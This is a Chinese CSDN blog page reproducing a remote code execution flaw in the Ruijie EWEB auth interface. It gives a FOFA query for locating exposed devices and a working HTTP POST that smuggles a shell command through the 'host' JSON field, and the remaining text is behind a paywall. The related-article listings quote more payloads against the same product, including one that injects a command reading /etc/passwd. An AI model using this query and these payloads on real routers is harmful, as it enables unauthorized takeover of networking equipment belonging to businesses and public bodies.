【漏洞复现】锐捷 EWEB auth 远程代码执行漏洞

从不学安全

已于 2024-03-26 20:14:31 修改

阅读量234

点赞数 6

分类专栏：漏洞复现文章标签：安全网络

于 2024-03-26 20:11:53 首次发布

本文链接：https://blog.csdn.net/qq_67810151/article/details/137056339

版权

漏洞复现专栏收录该内容

58 篇文章 13 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

0x01 产品简介

锐捷睿易是锐捷网络针对商业市场的子品牌。拥有易网络、交换机、路由器、无线、安全、云服务六大产品线，解决方案涵盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造业、中小教育、中小医疗、中小政府等商业用户。

0x02 漏洞概述

锐捷 EWEB auth接口存在远程代码执行漏洞，未授权的攻击者可以通过该漏洞执行恶意命令，进而导致服务器失陷。

0x03 测绘语句

fofa: body="cgi-bin/luci" && body="#f47f3e"

0x04 漏洞复现

1、上传文件POST /cgi-bin/luci/api/auth HTTP/1.1

Host:

Content-Type: application/json



{"method":"checkNet","params":{"host":"`echo Hello World!>test.txt`"}}

2、访问文件：

了解本专栏

订阅专栏解锁全文

超级会员免费看

优惠劵

从不学安全

关注关注

6
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
【漏洞复现】锐捷 EWEB auth 远程代码执行漏洞

锐捷 EWEB auth接口存在远程代码执行漏洞，未授权的攻击者可以通过该漏洞执行恶意命令，进而导致服务器失陷。
复制链接

扫一扫

专栏目录

订阅专栏

锐捷EWEB网管系统 RCE漏洞复现

0xSec

12-02

2244

Ruijie-EWEB 网管系统 flwo.control.php 中的 type 参数存在命令执行漏洞，攻击者可利用该漏洞执行任意命令，写入后门，获取服务器权限，进而控制整个web服务器。

锐捷 EWEB auth 远程命令执行漏洞复现

selecthch的博客

03-12

741

锐捷睿易是锐捷网络针对商业市场的子品牌。拥有易网络、交换机、路由器、无线、安全、云服务六大产品线，解决方案涵盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造业、中小教育、中小医疗、中小政府等商业用户。auth接口存在RCE漏洞，恶意攻击者可能会利用该漏洞执行恶意命令，进而导致服务器失陷。漏洞名称：锐捷 EWEB auth 远程命令执行漏洞。漏洞类别：远程代码执行。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】锐捷 EWEB auth 远程命令执行漏洞

weixin_52204925的博客

03-08

1469

auth接口存在RCE漏洞，恶意攻击者可能会利用该漏洞执行恶意命令，进而导致服务器失陷。

锐捷NBR路由器远程命令执行漏洞(CNVD-2021-09650）

m0_49025459的博客

05-11

1080

锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞，攻击者可利用该漏洞获取服务器控制权限。

锐捷EWEB路由器 auth 远程命令执行漏洞

weixin_43567873的博客

03-13

138

锐捷EWEB路由器 auth 远程命令执行漏洞

锐捷NBR路由器 EWEB网管系统远程命令执行漏洞 + GetShell

CCPxxxXxxx的博客

08-04

9714

锐捷NBR路由器 EWEB网管系统远程命令执行漏洞 + GetShell 漏洞编号： CNVD-2021-09650 漏洞描述：锐捷NBR路由器 EWEB网关系统部分接口存在命令注入，导致远程命令执行获取漏洞影响：锐捷NBR路由器 EWEB网关系统漏洞复现：首先打开网关系统然后在URL后面加 /guest_auth/guestIsUp.php，此路径为漏洞存在地。我们打开hacker Bar,在Post data 输入 mac=1&ip=127.0.0.1|cat /etc/pas

锐捷 NBR路由器远程命令执行漏洞（CNVD-2021-09650）

热门推荐

孤桜懶契

04-14

1万+

漏洞描述 i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入，导致远程命令执行获取权限漏洞影响 s ✅锐捷NBR路由器 EWEB网管系统空间测绘 d ⭕FOFA：title="锐捷网络-EWEB网管系统" ⭕FOFA：icon_hash="-692947551" 漏洞复现 ✅访问首页 ✅执行Payload命令 POST /guest_auth/guestIsUp.php mac=1&ip=127.0.0.1|cat /etc/passwd > test.tx

代码审计-锐捷NBR路由器 EWEB网管系统远程命令执行

众生度尽，方证菩提

10-29

297

那天下着很大的雨，母亲从城里走回来的时候，浑身就是一个泥人，那一刻我就知道我没有别的选择了

锐捷RG-UAC 账户硬编码漏洞批量检测exp

06-17

-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin"，获取相关资产后保存到txt文件，然后使用此脚本批量检测

07-27

01-24

06-07

锐捷模拟器的本地安装流程如下： 1、PC上安装VMware Workstation（官方下载）或者可以在服务器上安装VMware vSphere Hypervisor ESXI 7.0 （官方下载）下载完成后在本地安装好VMware环境（后续以VMware Workstation...

服务商版锐捷BDS大数据安全态势感知解决方案-LSW.pptx

06-16

系统自带基线检查模块，内置45个基线...为满足不同用户对漏洞评估的差异化需求，对支持检测结果外发的外置漏洞扫描系统，BDS同时提供兼容支持，通过漏洞扫描信息的采集，实现更全面的安全分析，满足不同场景安全需求。

解锁Nginx跨域谜题：3步打造安全高效的CORS策略

2401_85000826的博客

05-16

410

Nginx作为一款强大的Web服务器和反向代理服务器，经常被用于处理跨域资源共享（CORS，Cross-Origin Resource Sharing）策略，以允许或限制不同源之间的资源请求。CORS是一种安全策略，用于决定Web浏览器是否应允许从一个域名加载的网页访问另一个域名下的资源。下面将深入解析如何在Nginx配置中实现对origin（请求来源）的限制，以精确控制跨域请求。

最新发布

明明如月的技术博客

05-19

141

了解软件系统安全的几个重要概念：完整性、不可否认性、可控性、机密性和安全审计，可以通过一些日常生活中的例子来帮助理解。

防静电劳保鞋：工业安全中的隐形守护者

YOUSUTO的博客

05-16

435

因此，防静电措施在工业安全中显得尤为重要。在众多防静电措施中，防静电劳保鞋作为工作人员脚下的隐形守护者，发挥着不可替代的作用。防静电劳保鞋作为工业安全中的隐形守护者，在防止静电危害方面发挥着重要作用。在工业生产中，我们应该充分认识到防静电措施的重要性，并合理选择和使用防静电劳保鞋等防护用品。在电子制造、石油化工、物流运输等行业中，静电可能导致设备损坏、产品性能下降，甚至引发火灾或爆炸。而防静电劳保鞋作为工作人员日常穿着的防护用品，能够在人员走动、操作设备时，有效消除人体静电积聚，减少静电带来的潜在风险。

红队攻防渗透技术实战流程：云安全之云服务安全：ECS和RDS

HACKONE的博客

05-18

实例元数据（metadata）包含了弹性计算云服务器实例在阿里云系统中的信息，您可以在运行中的实例内方便地查看实例元数据，并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明，阿里云例子：https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址：http://metadata.tencentyun.com/CF 云渗透框架项目：https://wiki.teamssix.com/CF/

锐捷eg网关与nbr路由器命令执行漏洞

07-29

锐捷EG网关和NBR路由器是锐捷公司生产的网络设备，近期被曝出存在命令执行漏洞。该漏洞的存在使得攻击者能够通过特制的网络请求执行恶意命令，从而导致系统被入侵和控制。其中锐捷EG网关的漏洞编号为CVE-2017-...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交